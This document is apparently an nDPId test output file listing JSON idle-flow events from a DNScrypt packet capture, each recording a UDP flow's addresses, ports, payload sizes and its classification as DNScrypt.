-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 